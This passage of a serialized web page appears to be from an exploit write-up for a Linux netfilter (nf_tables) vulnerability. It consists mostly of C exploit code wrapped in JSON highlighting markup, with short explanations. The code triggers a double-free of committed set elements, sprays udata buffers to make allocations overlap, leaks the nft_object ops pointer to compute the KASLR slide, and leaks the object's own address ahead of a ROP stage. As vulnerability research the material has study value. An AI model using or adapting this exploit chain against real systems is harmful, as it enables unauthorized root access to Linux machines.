NFTNL_SET_ELEM_KEY, ",{"type":24,"tag":301,"props":61419,"children":61420},{"style":385},[61421],{"type":30,"value":556},{"type":24,"tag":301,"props":61423,"children":61424},{"style":359},[61425],{"type":30,"value":61426},"key, KEY_LEN);\n",{"type":24,"tag":301,"props":61428,"children":61429},{"class":303,"line":3631},[61430,61434,61438,61442,61447,61451],{"type":24,"tag":301,"props":61431,"children":61432},{"style":314},[61433],{"type":30,"value":61366},{"type":24,"tag":301,"props":61435,"children":61436},{"style":359},[61437],{"type":30,"value":362},{"type":24,"tag":301,"props":61439,"children":61440},{"style":369},[61441],{"type":30,"value":58789},{"type":24,"tag":301,"props":61443,"children":61444},{"style":359},[61445],{"type":30,"value":61446},"[i], NFTNL_SET_ELEM_USERDATA, ",{"type":24,"tag":301,"props":61448,"children":61449},{"style":385},[61450],{"type":30,"value":556},{"type":24,"tag":301,"props":61452,"children":61453},{"style":359},[61454],{"type":30,"value":61455},"udata_buf, size);\n",{"type":24,"tag":301,"props":61457,"children":61458},{"class":303,"line":3639},[61459,61464,61469,61473],{"type":24,"tag":301,"props":61460,"children":61461},{"style":314},[61462],{"type":30,"value":61463}," nftnl_set_elem_add",{"type":24,"tag":301,"props":61465,"children":61466},{"style":359},[61467],{"type":30,"value":61468},"(set, ",{"type":24,"tag":301,"props":61470,"children":61471},{"style":369},[61472],{"type":30,"value":58789},{"type":24,"tag":301,"props":61474,"children":61475},{"style":359},[61476],{"type":30,"value":61477},"[i]);\n",{"type":24,"tag":301,"props":61479,"children":61480},{"class":303,"line":3647},[61481],{"type":24,"tag":301,"props":61482,"children":61483},{"style":359},[61484],{"type":30,"value":501},{"type":24,"tag":301,"props":61486,"children":61487},{"class":303,"line":3685},[61488],{"type":24,"tag":301,"props":61489,"children":61490},{"style":359},[61491],{"type":30,"value":17123},{"type":24,"tag":301,"props":61493,"children":61494},{"class":303,"line":3713},[61495],{"type":24,"tag":301,"props":61496,"children":61497},{"emptyLinePlaceholder":16},[61498],{"type":30,"value":341},{"type":24,"tag":301,"props":61500,"children":61501},{"class":303,"line":3721},[61502],{"type":24,"tag":301,"props":61503,"children":61504},{"style":359},[61505],{"type":30,"value":61506}," // TRANSACTION 3\n",{"type":24,"tag":301,"props":61508,"children":61509},{"class":303,"line":3751},[61510],{"type":24,"tag":301,"props":61511,"children":61512},{"style":359},[61513],{"type":30,"value":17123},{"type":24,"tag":301,"props":61515,"children":61516},{"class":303,"line":3782},[61517],{"type":24,"tag":301,"props":61518,"children":61519},{"style":359},[61520],{"type":30,"value":61521}," set = nftnl_set_alloc();\n",{"type":24,"tag":301,"props":61523,"children":61524},{"class":303,"line":3791},[61525,61530],{"type":24,"tag":301,"props":61526,"children":61527},{"style":314},[61528],{"type":30,"value":61529}," nftnl_set_set_u32",{"type":24,"tag":301,"props":61531,"children":61532},{"style":359},[61533],{"type":30,"value":61534},"(set, NFTNL_SET_FAMILY, family);\n",{"type":24,"tag":301,"props":61536,"children":61537},{"class":303,"line":3819},[61538,61543],{"type":24,"tag":301,"props":61539,"children":61540},{"style":314},[61541],{"type":30,"value":61542}," nftnl_set_set_str",{"type":24,"tag":301,"props":61544,"children":61545},{"style":359},[61546],{"type":30,"value":61547},"(set, NFTNL_SET_TABLE, exploit_table_name);\n",{"type":24,"tag":301,"props":61549,"children":61550},{"class":303,"line":4397},[61551,61555,61560,61564],{"type":24,"tag":301,"props":61552,"children":61553},{"style":314},[61554],{"type":30,"value":61542},{"type":24,"tag":301,"props":61556,"children":61557},{"style":359},[61558],{"type":30,"value":61559},"(set, NFTNL_SET_NAME, ",{"type":24,"tag":301,"props":61561,"children":61562},{"style":329},[61563],{"type":30,"value":61160},{"type":24,"tag":301,"props":61565,"children":61566},{"style":359},[61567],{"type":30,"value":589},{"type":24,"tag":301,"props":61569,"children":61570},{"class":303,"line":4405},[61571],{"type":24,"tag":301,"props":61572,"children":61573},{"emptyLinePlaceholder":16},[61574],{"type":30,"value":341},{"type":24,"tag":301,"props":61576,"children":61577},{"class":303,"line":4422},[61578],{"type":24,"tag":301,"props":61579,"children":61580},{"style":1062},[61581],{"type":30,"value":61582}," // make priv->dirty true\n",{"type":24,"tag":301,"props":61584,"children":61585},{"class":303,"line":4438},[61586,61591,61595,61600],{"type":24,"tag":301,"props":61587,"children":61588},{"style":314},[61589],{"type":30,"value":61590}," memset",{"type":24,"tag":301,"props":61592,"children":61593},{"style":359},[61594],{"type":30,"value":61344},{"type":24,"tag":301,"props":61596,"children":61597},{"style":466},[61598],{"type":30,"value":61599},"0xff",{"type":24,"tag":301,"props":61601,"children":61602},{"style":359},[61603],{"type":30,"value":61604},", KEY_LEN);\n",{"type":24,"tag":301,"props":61606,"children":61607},{"class":303,"line":4446},[61608,61613,61617,61621,61625,61629,61633],{"type":24,"tag":301,"props":61609,"children":61610},{"style":369},[61611],{"type":30,"value":61612}," elem",{"type":24,"tag":301,"props":61614,"children":61615},{"style":359},[61616],{"type":30,"value":541},{"type":24,"tag":301,"props":61618,"children":61619},{"style":466},[61620],{"type":30,"value":1447},{"type":24,"tag":301,"props":61622,"children":61623},{"style":359},[61624],{"type":30,"value":1046},{"type":24,"tag":301,"props":61626,"children":61627},{"style":385},[61628],{"type":30,"value":523},{"type":24,"tag":301,"props":61630,"children":61631},{"style":314},[61632],{"type":30,"value":61327},{"type":24,"tag":301,"props":61634,"children":61635},{"style":359},[61636],{"type":30,"value":4859},{"type":24,"tag":301,"props":61638,"children":61639},{"class":303,"line":4506},[61640,61645,61649,61653,61657,61661,61666,61670,61674,61678],{"type":24,"tag":301,"props":61641,"children":61642},{"style":314},[61643],{"type":30,"value":61644}," nftnl_set_elem_set",{"type":24,"tag":301,"props":61646,"children":61647},{"style":359},[61648],{"type":30,"value":362},{"type":24,"tag":301,"props":61650,"children":61651},{"style":369},[61652],{"type":30,"value":58789},{"type":24,"tag":301,"props":61654,"children":61655},{"style":359},[61656],{"type":30,"value":541},{"type":24,"tag":301,"props":61658,"children":61659},{"style":466},[61660],{"type":30,"value":1447},{"type":24,"tag":301,"props":61662,"children":61663},{"style":359},[61664],{"type":30,"value":61665},"], NFTNL_SET_ELEM_OBJREF, ",{"type":24,"tag":301,"props":61667,"children":61668},{"style":329},[61669],{"type":30,"value":61384},{"type":24,"tag":301,"props":61671,"children":61672},{"style":359},[61673],{"type":30,"value":377},{"type":24,"tag":301,"props":61675,"children":61676},{"style":466},[61677],{"type":30,"value":61393},{"type":24,"tag":301,"props":61679,"children":61680},{"style":359},[61681],{"type":30,"value":589},{"type":24,"tag":301,"props":61683,"children":61684},{"class":303,"line":4566},[61685,61689,61693,61697,61701,61705,61710,61714],{"type":24,"tag":301,"props":61686,"children":61687},{"style":314},[61688],{"type":30,"value":61644},{"type":24,"tag":301,"props":61690,"children":61691},{"style":359},[61692],{"type":30,"value":362},{"type":24,"tag":301,"props":61694,"children":61695},{"style":369},[61696],{"type":30,"value":58789},{"type":24,"tag":301,"props":61698,"children":61699},{"style":359},[61700],{"type":30,"value":541},{"type":24,"tag":301,"props":61702,"children":61703},{"style":466},[61704],{"type":30,"value":1447},{"type":24,"tag":301,"props":61706,"children":61707},{"style":359},[61708],{"type":30,"value":61709},"], NFTNL_SET_ELEM_KEY, ",{"type":24,"tag":301,"props":61711,"children":61712},{"style":385},[61713],{"type":30,"value":556},{"type":24,"tag":301,"props":61715,"children":61716},{"style":359},[61717],{"type":30,"value":61426},{"type":24,"tag":301,"props":61719,"children":61720},{"class":303,"line":4574},[61721,61726,61730,61734,61738,61742],{"type":24,"tag":301,"props":61722,"children":61723},{"style":314},[61724],{"type":30,"value":61725}," nftnl_set_elem_add",{"type":24,"tag":301,"props":61727,"children":61728},{"style":359},[61729],{"type":30,"value":61468},{"type":24,"tag":301,"props":61731,"children":61732},{"style":369},[61733],{"type":30,"value":58789},{"type":24,"tag":301,"props":61735,"children":61736},{"style":359},[61737],{"type":30,"value":541},{"type":24,"tag":301,"props":61739,"children":61740},{"style":466},[61741],{"type":30,"value":1447},{"type":24,"tag":301,"props":61743,"children":61744},{"style":359},[61745],{"type":30,"value":10578},{"type":24,"tag":301,"props":61747,"children":61748},{"class":303,"line":4590},[61749],{"type":24,"tag":301,"props":61750,"children":61751},{"style":359},[61752],{"type":30,"value":17123},{"type":24,"tag":301,"props":61754,"children":61755},{"class":303,"line":4599},[61756],{"type":24,"tag":301,"props":61757,"children":61758},{"emptyLinePlaceholder":16},[61759],{"type":30,"value":341},{"type":24,"tag":301,"props":61761,"children":61762},{"class":303,"line":4629},[61763],{"type":24,"tag":301,"props":61764,"children":61765},{"style":359},[61766],{"type":30,"value":61767}," // double-free commited elems\n",{"type":24,"tag":301,"props":61769,"children":61770},{"class":303,"line":4659},[61771],{"type":24,"tag":301,"props":61772,"children":61773},{"style":359},[61774],{"type":30,"value":17123},{"type":24,"tag":301,"props":61776,"children":61777},{"class":303,"line":4668},[61778,61783,61787],{"type":24,"tag":301,"props":61779,"children":61780},{"style":359},[61781],{"type":30,"value":61782}," nftnl_set_free(",{"type":24,"tag":301,"props":61784,"children":61785},{"style":10246},[61786],{"type":30,"value":57749},{"type":24,"tag":301,"props":61788,"children":61789},{"style":359},[61790],{"type":30,"value":589},{"type":24,"tag":301,"props":61792,"children":61793},{"class":303,"line":4677},[61794],{"type":24,"tag":301,"props":61795,"children":61796},{"style":359},[61797],{"type":30,"value":698},{"type":24,"tag":301,"props":61799,"children":61800},{"class":303,"line":4697},[61801],{"type":24,"tag":301,"props":61802,"children":61803},{"style":359},[61804],{"type":30,"value":17123},{"type":24,"tag":80,"props":61806,"children":61808},{"id":61807},"leaking-kaslr",[61809],{"type":30,"value":61810},"Leaking KASLR",{"type":24,"tag":32,"props":61812,"children":61813},{},[61814,61816,61822,61824,61829,61831,61837,61839,61845,61847],{"type":30,"value":61815},"Tables contain an outline user data buffer ",{"type":24,"tag":145,"props":61817,"children":61819},{"className":61818},[],[61820],{"type":30,"value":61821},"udata",{"type":30,"value":61823}," that we can both read and write. By allocating a ",{"type":24,"tag":145,"props":61825,"children":61827},{"className":61826},[],[61828],{"type":30,"value":61821},{"type":30,"value":61830}," buffer on the double-free slot and then overlapping it with an ",{"type":24,"tag":145,"props":61832,"children":61834},{"className":61833},[],[61835],{"type":30,"value":61836},"nft_object",{"type":30,"value":61838}," we can leak the ",{"type":24,"tag":145,"props":61840,"children":61842},{"className":61841},[],[61843],{"type":30,"value":61844},"->ops",{"type":30,"value":61846}," pointer, and use it to calculate the KASLR slide.\n",{"type":24,"tag":177,"props":61848,"children":61850},{"alt":179,"src":61849},"/posts/netfilter-universal-root-1-day/kaslr.png",[],{"type":24,"tag":291,"props":61852,"children":61854},{"className":35866,"code":61853,"language":35868,"meta":7,"style":7},"[...]\n // spray 3 udata buffers to consume elems A, B and A again\n udata_spray(nl, 0xe8, 0, 3, NULL);\n\n // check if overlap happened (i.e if we have to overlapping udata buffers)\n char spray_name[16];\n char *udata[3];\n for (int i = 0; i \u003C 3; i++)\n {\n snprintf(spray_name, sizeof(spray_name), \"spray-%i\", i);\n udata[i] = getudata(nl, spray_name);\n }\n if (udata[0][0] == udata[2][0])\n {\n puts(\"[+] got duplicated table\");\n }\n\n // Replace one of the udata buffers with nft_object\n // and read it's counterpart to leak the nft_object struct\n puts(\"[*] Info leak\");\n deludata_spray(nl, 0, 1);\n wait_destroyer();\n obj_spray(nl, 0, 1, NULL, 0);\n uint64_t *fake_obj = (uint64_t *)getudata(nl, \"spray-2\");\n[...]\n",[61855],{"type":24,"tag":145,"props":61856,"children":61857},{"__ignoreMap":7},[61858,61865,61873,61908,61915,61923,61948,61975,62026,62033,62066,62092,62099,62164,62171,62192,62199,62206,62214,62222,62243,62272,62284,62328,62383],{"type":24,"tag":301,"props":61859,"children":61860},{"class":303,"line":304},[61861],{"type":24,"tag":301,"props":61862,"children":61863},{"style":359},[61864],{"type":30,"value":17123},{"type":24,"tag":301,"props":61866,"children":61867},{"class":303,"line":320},[61868],{"type":24,"tag":301,"props":61869,"children":61870},{"style":359},[61871],{"type":30,"value":61872}," // spray 3 udata buffers to consume elems A, B and A again\n",{"type":24,"tag":301,"props":61874,"children":61875},{"class":303,"line":335},[61876,61881,61885,61890,61895,61900,61904],{"type":24,"tag":301,"props":61877,"children":61878},{"style":359},[61879],{"type":30,"value":61880}," udata_spray(",{"type":24,"tag":301,"props":61882,"children":61883},{"style":10246},[61884],{"type":30,"value":61014},{"type":24,"tag":301,"props":61886,"children":61887},{"style":359},[61888],{"type":30,"value":61889},", 0",{"type":24,"tag":301,"props":61891,"children":61892},{"style":10246},[61893],{"type":30,"value":61894},"xe8",{"type":24,"tag":301,"props":61896,"children":61897},{"style":359},[61898],{"type":30,"value":61899},", 0, 3, ",{"type":24,"tag":301,"props":61901,"children":61902},{"style":10246},[61903],{"type":30,"value":8855},{"type":24,"tag":301,"props":61905,"children":61906},{"style":359},[61907],{"type":30,"value":589},{"type":24,"tag":301,"props":61909,"children":61910},{"class":303,"line":344},[61911],{"type":24,"tag":301,"props":61912,"children":61913},{"emptyLinePlaceholder":16},[61914],{"type":30,"value":341},{"type":24,"tag":301,"props":61916,"children":61917},{"class":303,"line":401},[61918],{"type":24,"tag":301,"props":61919,"children":61920},{"style":1062},[61921],{"type":30,"value":61922}," // check if overlap happened (i.e if we have to overlapping udata buffers)\n",{"type":24,"tag":301,"props":61924,"children":61925},{"class":303,"line":415},[61926,61931,61936,61940,61944],{"type":24,"tag":301,"props":61927,"children":61928},{"style":348},[61929],{"type":30,"value":61930}," char",{"type":24,"tag":301,"props":61932,"children":61933},{"style":369},[61934],{"type":30,"value":61935}," spray_name",{"type":24,"tag":301,"props":61937,"children":61938},{"style":359},[61939],{"type":30,"value":541},{"type":24,"tag":301,"props":61941,"children":61942},{"style":466},[61943],{"type":30,"value":3073},{"type":24,"tag":301,"props":61945,"children":61946},{"style":359},[61947],{"type":30,"value":1423},{"type":24,"tag":301,"props":61949,"children":61950},{"class":303,"line":439},[61951,61955,61959,61963,61967,61971],{"type":24,"tag":301,"props":61952,"children":61953},{"style":348},[61954],{"type":30,"value":61930},{"type":24,"tag":301,"props":61956,"children":61957},{"style":385},[61958],{"type":30,"value":431},{"type":24,"tag":301,"props":61960,"children":61961},{"style":369},[61962],{"type":30,"value":61821},{"type":24,"tag":301,"props":61964,"children":61965},{"style":359},[61966],{"type":30,"value":541},{"type":24,"tag":301,"props":61968,"children":61969},{"style":466},[61970],{"type":30,"value":1447},{"type":24,"tag":301,"props":61972,"children":61973},{"style":359},[61974],{"type":30,"value":1423},{"type":24,"tag":301,"props":61976,"children":61977},{"class":303,"line":447},[61978,61982,61986,61990,61994,61998,62002,62006,62010,62014,62018,62022],{"type":24,"tag":301,"props":61979,"children":61980},{"style":308},[61981],{"type":30,"value":3249},{"type":24,"tag":301,"props":61983,"children":61984},{"style":359},[61985],{"type":30,"value":873},{"type":24,"tag":301,"props":61987,"children":61988},{"style":348},[61989],{"type":30,"value":351},{"type":24,"tag":301,"props":61991,"children":61992},{"style":359},[61993],{"type":30,"value":1998},{"type":24,"tag":301,"props":61995,"children":61996},{"style":385},[61997],{"type":30,"value":523},{"type":24,"tag":301,"props":61999,"children":62000},{"style":466},[62001],{"type":30,"value":685},{"type":24,"tag":301,"props":62003,"children":62004},{"style":359},[62005],{"type":30,"value":1844},{"type":24,"tag":301,"props":62007,"children":62008},{"style":385},[62009],{"type":30,"value":1849},{"type":24,"tag":301,"props":62011,"children":62012},{"style":466},[62013],{"type":30,"value":25873},{"type":24,"tag":301,"props":62015,"children":62016},{"style":359},[62017],{"type":30,"value":57990},{"type":24,"tag":301,"props":62019,"children":62020},{"style":385},[62021],{"type":30,"value":1859},{"type":24,"tag":301,"props":62023,"children":62024},{"style":359},[62025],{"type":30,"value":791},{"type":24,"tag":301,"props":62027,"children":62028},{"class":303,"line":476},[62029],{"type":24,"tag":301,"props":62030,"children":62031},{"style":359},[62032],{"type":30,"value":35943},{"type":24,"tag":301,"props":62034,"children":62035},{"class":303,"line":495},[62036,62041,62046,62051,62056,62061],{"type":24,"tag":301,"props":62037,"children":62038},{"style":314},[62039],{"type":30,"value":62040}," snprintf",{"type":24,"tag":301,"props":62042,"children":62043},{"style":359},[62044],{"type":30,"value":62045},"(spray_name, ",{"type":24,"tag":301,"props":62047,"children":62048},{"style":348},[62049],{"type":30,"value":62050},"sizeof",{"type":24,"tag":301,"props":62052,"children":62053},{"style":359},[62054],{"type":30,"value":62055},"(spray_name), ",{"type":24,"tag":301,"props":62057,"children":62058},{"style":329},[62059],{"type":30,"value":62060},"\"spray-%i\"",{"type":24,"tag":301,"props":62062,"children":62063},{"style":359},[62064],{"type":30,"value":62065},", i);\n",{"type":24,"tag":301,"props":62067,"children":62068},{"class":303,"line":504},[62069,62074,62078,62082,62087],{"type":24,"tag":301,"props":62070,"children":62071},{"style":369},[62072],{"type":30,"value":62073}," udata",{"type":24,"tag":301,"props":62075,"children":62076},{"style":359},[62077],{"type":30,"value":61318},{"type":24,"tag":301,"props":62079,"children":62080},{"style":385},[62081],{"type":30,"value":523},{"type":24,"tag":301,"props":62083,"children":62084},{"style":314},[62085],{"type":30,"value":62086}," getudata",{"type":24,"tag":301,"props":62088,"children":62089},{"style":359},[62090],{"type":30,"value":62091},"(nl, spray_name);\n",{"type":24,"tag":301,"props":62093,"children":62094},{"class":303,"line":512},[62095],{"type":24,"tag":301,"props":62096,"children":62097},{"style":359},[62098],{"type":30,"value":501},{"type":24,"tag":301,"props":62100,"children":62101},{"class":303,"line":592},[62102,62106,62110,62114,62118,62122,62126,62130,62134,62138,62143,62147,62151,62155,62159],{"type":24,"tag":301,"props":62103,"children":62104},{"style":308},[62105],{"type":30,"value":453},{"type":24,"tag":301,"props":62107,"children":62108},{"style":359},[62109],{"type":30,"value":873},{"type":24,"tag":301,"props":62111,"children":62112},{"style":369},[62113],{"type":30,"value":61821},{"type":24,"tag":301,"props":62115,"children":62116},{"style":359},[62117],{"type":30,"value":541},{"type":24,"tag":301,"props":62119,"children":62120},{"style":466},[62121],{"type":30,"value":584},{"type":24,"tag":301,"props":62123,"children":62124},{"style":359},[62125],{"type":30,"value":1756},{"type":24,"tag":301,"props":62127,"children":62128},{"style":466},[62129],{"type":30,"value":584},{"type":24,"tag":301,"props":62131,"children":62132},{"style":359},[62133],{"type":30,"value":1046},{"type":24,"tag":301,"props":62135,"children":62136},{"style":385},[62137],{"type":30,"value":607},{"type":24,"tag":301,"props":62139,"children":62140},{"style":369},[62141],{"type":30,"value":62142}," udata",{"type":24,"tag":301,"props":62144,"children":62145},{"style":359},[62146],{"type":30,"value":541},{"type":24,"tag":301,"props":62148,"children":62149},{"style":466},[62150],{"type":30,"value":1503},{"type":24,"tag":301,"props":62152,"children":62153},{"style":359},[62154],{"type":30,"value":1756},{"type":24,"tag":301,"props":62156,"children":62157},{"style":466},[62158],{"type":30,"value":584},{"type":24,"tag":301,"props":62160,"children":62161},{"style":359},[62162],{"type":30,"value":62163},"])\n",{"type":24,"tag":301,"props":62165,"children":62166},{"class":303,"line":619},[62167],{"type":24,"tag":301,"props":62168,"children":62169},{"style":359},[62170],{"type":30,"value":35943},{"type":24,"tag":301,"props":62172,"children":62173},{"class":303,"line":635},[62174,62179,62183,62188],{"type":24,"tag":301,"props":62175,"children":62176},{"style":314},[62177],{"type":30,"value":62178}," puts",{"type":24,"tag":301,"props":62180,"children":62181},{"style":359},[62182],{"type":30,"value":362},{"type":24,"tag":301,"props":62184,"children":62185},{"style":329},[62186],{"type":30,"value":62187},"\"[+] got duplicated table\"",{"type":24,"tag":301,"props":62189,"children":62190},{"style":359},[62191],{"type":30,"value":589},{"type":24,"tag":301,"props":62193,"children":62194},{"class":303,"line":643},[62195],{"type":24,"tag":301,"props":62196,"children":62197},{"style":359},[62198],{"type":30,"value":501},{"type":24,"tag":301,"props":62200,"children":62201},{"class":303,"line":652},[62202],{"type":24,"tag":301,"props":62203,"children":62204},{"emptyLinePlaceholder":16},[62205],{"type":30,"value":341},{"type":24,"tag":301,"props":62207,"children":62208},{"class":303,"line":666},[62209],{"type":24,"tag":301,"props":62210,"children":62211},{"style":1062},[62212],{"type":30,"value":62213}," // Replace one of the udata buffers with nft_object\n",{"type":24,"tag":301,"props":62215,"children":62216},{"class":303,"line":674},[62217],{"type":24,"tag":301,"props":62218,"children":62219},{"style":1062},[62220],{"type":30,"value":62221}," // and read it's counterpart to leak the nft_object struct\n",{"type":24,"tag":301,"props":62223,"children":62224},{"class":303,"line":692},[62225,62230,62234,62239],{"type":24,"tag":301,"props":62226,"children":62227},{"style":314},[62228],{"type":30,"value":62229}," puts",{"type":24,"tag":301,"props":62231,"children":62232},{"style":359},[62233],{"type":30,"value":362},{"type":24,"tag":301,"props":62235,"children":62236},{"style":329},[62237],{"type":30,"value":62238},"\"[*] Info leak\"",{"type":24,"tag":301,"props":62240,"children":62241},{"style":359},[62242],{"type":30,"value":589},{"type":24,"tag":301,"props":62244,"children":62245},{"class":303,"line":3631},[62246,62251,62256,62260,62264,62268],{"type":24,"tag":301,"props":62247,"children":62248},{"style":314},[62249],{"type":30,"value":62250}," deludata_spray",{"type":24,"tag":301,"props":62252,"children":62253},{"style":359},[62254],{"type":30,"value":62255},"(nl, ",{"type":24,"tag":301,"props":62257,"children":62258},{"style":466},[62259],{"type":30,"value":584},{"type":24,"tag":301,"props":62261,"children":62262},{"style":359},[62263],{"type":30,"value":377},{"type":24,"tag":301,"props":62265,"children":62266},{"style":466},[62267],{"type":30,"value":546},{"type":24,"tag":301,"props":62269,"children":62270},{"style":359},[62271],{"type":30,"value":589},{"type":24,"tag":301,"props":62273,"children":62274},{"class":303,"line":3639},[62275,62280],{"type":24,"tag":301,"props":62276,"children":62277},{"style":314},[62278],{"type":30,"value":62279}," wait_destroyer",{"type":24,"tag":301,"props":62281,"children":62282},{"style":359},[62283],{"type":30,"value":4859},{"type":24,"tag":301,"props":62285,"children":62286},{"class":303,"line":3647},[62287,62292,62296,62300,62304,62308,62312,62316,62320,62324],{"type":24,"tag":301,"props":62288,"children":62289},{"style":314},[62290],{"type":30,"value":62291}," obj_spray",{"type":24,"tag":301,"props":62293,"children":62294},{"style":359},[62295],{"type":30,"value":62255},{"type":24,"tag":301,"props":62297,"children":62298},{"style":466},[62299],{"type":30,"value":584},{"type":24,"tag":301,"props":62301,"children":62302},{"style":359},[62303],{"type":30,"value":377},{"type":24,"tag":301,"props":62305,"children":62306},{"style":466},[62307],{"type":30,"value":546},{"type":24,"tag":301,"props":62309,"children":62310},{"style":359},[62311],{"type":30,"value":377},{"type":24,"tag":301,"props":62313,"children":62314},{"style":348},[62315],{"type":30,"value":8855},{"type":24,"tag":301,"props":62317,"children":62318},{"style":359},[62319],{"type":30,"value":377},{"type":24,"tag":301,"props":62321,"children":62322},{"style":466},[62323],{"type":30,"value":584},{"type":24,"tag":301,"props":62325,"children":62326},{"style":359},[62327],{"type":30,"value":589},{"type":24,"tag":301,"props":62329,"children":62330},{"class":303,"line":3685},[62331,62336,62340,62345,62349,62353,62357,62361,62365,62370,62374,62379],{"type":24,"tag":301,"props":62332,"children":62333},{"style":348},[62334],{"type":30,"value":62335}," uint64_t",{"type":24,"tag":301,"props":62337,"children":62338},{"style":385},[62339],{"type":30,"value":431},{"type":24,"tag":301,"props":62341,"children":62342},{"style":359},[62343],{"type":30,"value":62344},"fake_obj ",{"type":24,"tag":301,"props":62346,"children":62347},{"style":385},[62348],{"type":30,"value":523},{"type":24,"tag":301,"props":62350,"children":62351},{"style":359},[62352],{"type":30,"value":873},{"type":24,"tag":301,"props":62354,"children":62355},{"style":348},[62356],{"type":30,"value":6020},{"type":24,"tag":301,"props":62358,"children":62359},{"style":385},[62360],{"type":30,"value":431},{"type":24,"tag":301,"props":62362,"children":62363},{"style":359},[62364],{"type":30,"value":9961},{"type":24,"tag":301,"props":62366,"children":62367},{"style":314},[62368],{"type":30,"value":62369},"getudata",{"type":24,"tag":301,"props":62371,"children":62372},{"style":359},[62373],{"type":30,"value":62255},{"type":24,"tag":301,"props":62375,"children":62376},{"style":329},[62377],{"type":30,"value":62378},"\"spray-2\"",{"type":24,"tag":301,"props":62380,"children":62381},{"style":359},[62382],{"type":30,"value":589},{"type":24,"tag":301,"props":62384,"children":62385},{"class":303,"line":3713},[62386],{"type":24,"tag":301,"props":62387,"children":62388},{"style":359},[62389],{"type":30,"value":17123},{"type":24,"tag":80,"props":62391,"children":62393},{"id":62392},"leaking-self-pointer-of-nft_object",[62394,62396],{"type":30,"value":62395},"Leaking self pointer of ",{"type":24,"tag":145,"props":62397,"children":62399},{"className":62398},[],[62400],{"type":30,"value":61836},{"type":24,"tag":32,"props":62402,"children":62403},{},[62404,62406,62411,62413,62418,62420,62425,62427,62433],{"type":30,"value":62405},"As I'll discuss in more depth in the ROP section, the exploit relies on a known address of controllable memory to work. I decided to use the ",{"type":24,"tag":145,"props":62407,"children":62409},{"className":62408},[],[62410],{"type":30,"value":61836},{"type":30,"value":62412}," to get its own address. This is possible because the ",{"type":24,"tag":145,"props":62414,"children":62416},{"className":62415},[],[62417],{"type":30,"value":61836},{"type":30,"value":62419}," has a ",{"type":24,"tag":145,"props":62421,"children":62423},{"className":62422},[],[62424],{"type":30,"value":61821},{"type":30,"value":62426}," pointer (similar to ",{"type":24,"tag":145,"props":62428,"children":62430},{"className":62429},[],[62431],{"type":30,"value":62432},"table->udata",{"type":30,"value":62434}," that I used for leaking KASLR), that I can use to read/write data.",{"type":24,"tag":32,"props":62436,"children":62437},{},[62438,62439,62444,62446,62452,62454,62459,62461,62467,62469,62475,62477,62482,62484,62489,62491,62496,62498],{"type":30,"value":8079},{"type":24,"tag":145,"props":62440,"children":62442},{"className":62441},[],[62443],{"type":30,"value":61836},{"type":30,"value":62445}," struct also contains a ",{"type":24,"tag":145,"props":62447,"children":62449},{"className":62448},[],[62450],{"type":30,"value":62451},"list_head",{"type":30,"value":62453}," inserted in a circular list containing all ",{"type":24,"tag":145,"props":62455,"children":62457},{"className":62456},[],[62458],{"type":30,"value":61836},{"type":30,"value":62460},"'s that belong to a given ",{"type":24,"tag":145,"props":62462,"children":62464},{"className":62463},[],[62465],{"type":30,"value":62466},"table",{"type":30,"value":62468},". Considering that our object is currently alone in its table, the ",{"type":24,"tag":145,"props":62470,"children":62472},{"className":62471},[],[62473],{"type":30,"value":62474},"table->list.next",{"type":30,"value":62476}," pointer in the ",{"type":24,"tag":145,"props":62478,"children":62480},{"className":62479},[],[62481],{"type":30,"value":61836},{"type":30,"value":62483}," will point back to the ",{"type":24,"tag":145,"props":62485,"children":62487},{"className":62486},[],[62488],{"type":30,"value":62451},{"type":30,"value":62490}," contained in the ",{"type":24,"tag":145,"props":62492,"children":62494},{"className":62493},[],[62495],{"type":30,"value":62466},{"type":30,"value":62497}," and vice-versa.\n",{"type":24,"tag":177,"props":62499,"children":62501},{"alt":179,"src":62500},"/posts/netfilter-universal-root-1-day/nft-object.png",[],{"type":24,"tag":32,"props":62503,"children":62504},{},[62505,62507,62512,62513,62518,62520,62526,62528,62533,62534,62539,62541,62546,62548,62553],{"type":30,"value":62506},"In short, that means that if we swap the ",{"type":24,"tag":145,"props":62508,"children":62510},{"className":62509},[],[62511],{"type":30,"value":61821},{"type":30,"value":6424},{"type":24,"tag":145,"props":62514,"children":62516},{"className":62515},[],[62517],{"type":30,"value":61836},{"type":30,"value":62519}," with its own ",{"type":24,"tag":145,"props":62521,"children":62523},{"className":62522},[],[62524],{"type":30,"value":62525},"list.next",{"type":30,"value":62527}," pointer we should be able to read a pointer back to the ",{"type":24,"tag":145,"props":62529,"children":62531},{"className":62530},[],[62532],{"type":30,"value":61836},{"type":30,"value":59064},{"type":24,"tag":145,"props":62535,"children":62537},{"className":62536},[],[62538],{"type":30,"value":62451},{"type":30,"value":62540}," which is also the start of the ",{"type":24,"tag":145,"props":62542,"children":62544},{"className":62543},[],[62545],{"type":30,"value":61836},{"type":30,"value":62547}," itself.\n",{"type":24,"tag":60,"props":62549,"children":62550},{},[62551],{"type":30,"value":62552},"NOTE:",{"type":30,"value":62554}," This is a novel small trick.",{"type":24,"tag":291,"props":62556,"children":62558},{"className":35866,"code":62557,"language":35868,"meta":7,"style":7},"[...]\n // Leak nft_object ptr using table linked list\n fake_obj[8] = 8; // ulen = 8\n fake_obj[9] = fake_obj[0]; // udata = list->next\n deludata_spray(nl, 2, 1);\n wait_destroyer();\n udata_spray(nl, 0xe8, 3, 1, fake_obj);\n\n get_obj(nl, \"spray-0\", true);\n printf(\"[*] nft_object ptr: 0x%lx\\n\", obj_ptr);\n[...]\n",[62559],{"type":24,"tag":145,"props":62560,"children":62561},{"__ignoreMap":7},[62562,62569,62577,62590,62637,62664,62675,62713,62720,62749,62779],{"type":24,"tag":301,"props":62563,"children":62564},{"class":303,"line":304},[62565],{"type":24,"tag":301,"props":62566,"children":62567},{"style":359},[62568],{"type":30,"value":17123},{"type":24,"tag":301,"props":62570,"children":62571},{"class":303,"line":320},[62572],{"type":24,"tag":301,"props":62573,"children":62574},{"style":359},[62575],{"type":30,"value":62576}," // Leak nft_object ptr using table linked list\n",{"type":24,"tag":301,"props":62578,"children":62579},{"class":303,"line":335},[62580,62585],{"type":24,"tag":301,"props":62581,"children":62582},{"style":359},[62583],{"type":30,"value":62584}," fake_obj[8] = 8;",{"type":24,"tag":301,"props":62586,"children":62587},{"style":1062},[62588],{"type":30,"value":62589}," // ulen = 8\n",{"type":24,"tag":301,"props":62591,"children":62592},{"class":303,"line":344},[62593,62598,62602,62607,62611,62615,62620,62624,62628,62632],{"type":24,"tag":301,"props":62594,"children":62595},{"style":369},[62596],{"type":30,"value":62597}," 